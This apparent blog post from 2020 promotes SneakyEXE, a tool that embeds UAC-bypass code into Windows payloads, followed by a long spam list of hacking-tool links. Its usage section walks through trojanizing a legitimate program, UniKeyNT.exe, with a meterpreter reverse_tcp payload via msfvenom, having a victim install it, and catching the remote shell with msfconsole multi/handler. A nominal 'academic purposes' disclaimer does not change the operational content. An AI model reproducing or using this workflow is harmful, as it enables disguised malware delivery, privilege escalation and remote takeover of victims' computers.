Pages

Thursday, 27 August 2020

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


More info
  1. Hack Tools Online
  2. Hacking Tools Hardware
  3. Game Hacking
  4. Pentest Tools For Mac
  5. Hacks And Tools
  6. Pentest Tools Download
  7. World No 1 Hacker Software
  8. Hack Tools
  9. Pentest Tools For Android
  10. Hack Tools 2019
  11. Pentest Tools Open Source
  12. Best Hacking Tools 2019
  13. Free Pentest Tools For Windows
  14. Pentest Recon Tools
  15. Game Hacking
  16. Hacker Tools
  17. Pentest Tools Alternative
  18. Hack Website Online Tool
  19. Beginner Hacker Tools
  20. Pentest Tools Subdomain
  21. Hacker Tools Github
  22. Hack Tools Pc
  23. Hacker
  24. Pentest Tools For Mac
  25. Hack Tools Online
  26. Hack Tool Apk No Root
  27. Hack And Tools
  28. Tools 4 Hack
  29. Hacking Tools
  30. Pentest Tools Nmap
  31. Hacker Tools List
  32. Pentest Tools For Ubuntu
  33. What Are Hacking Tools
  34. Hacker Tools For Windows
  35. Pentest Tools Framework
  36. Hack Tools Pc
  37. Hackrf Tools
  38. Hacker Hardware Tools
  39. Hacking Apps
  40. Termux Hacking Tools 2019
  41. Best Pentesting Tools 2018
  42. Hacking Tools For Windows
  43. Hacker Tools Apk
  44. Hack Tools For Windows
  45. Free Pentest Tools For Windows
  46. Hacker Tools List
  47. What Are Hacking Tools
  48. Hacking Tools Kit
  49. Pentest Box Tools Download
  50. Termux Hacking Tools 2019
  51. Hacking Apps
  52. Tools For Hacker
  53. Hacking Tools Usb
  54. Wifi Hacker Tools For Windows
  55. Hacker Tools For Pc
  56. Pentest Box Tools Download
  57. Pentest Tools Windows
  58. Hack Tools For Games
  59. Hacker
  60. Hack Tools For Pc
  61. Bluetooth Hacking Tools Kali
  62. Nsa Hacker Tools
  63. Hacking Tools Kit
  64. Hacking Tools Free Download
  65. Pentest Tools Download
  66. Pentest Box Tools Download
  67. Hacker Tools Apk
  68. Hacking Tools For Windows 7
  69. Github Hacking Tools
  70. Hacker Tools Linux
  71. Pentest Tools Website Vulnerability
  72. Hacker Tools Online
  73. Hacker Tools List
  74. Hacker
  75. Nsa Hacker Tools
  76. Hack Tools Online
  77. Hacking Tools Download
  78. Hacker Tool Kit
  79. Pentest Tools Apk
  80. Computer Hacker
  81. Hacker Tools Apk
  82. Hacking Tools Free Download
  83. Pentest Tools Kali Linux
  84. Hack Tools Pc
  85. Wifi Hacker Tools For Windows
  86. Hacker Tools Free Download
  87. Hack Tools For Ubuntu
  88. Hak5 Tools
  89. Hacker Tools Github
  90. Hacker Tools Free Download
  91. Best Hacking Tools 2020
  92. Hacking Tools Free Download
  93. Hack Tools 2019
  94. Hackers Toolbox

No comments:

Post a Comment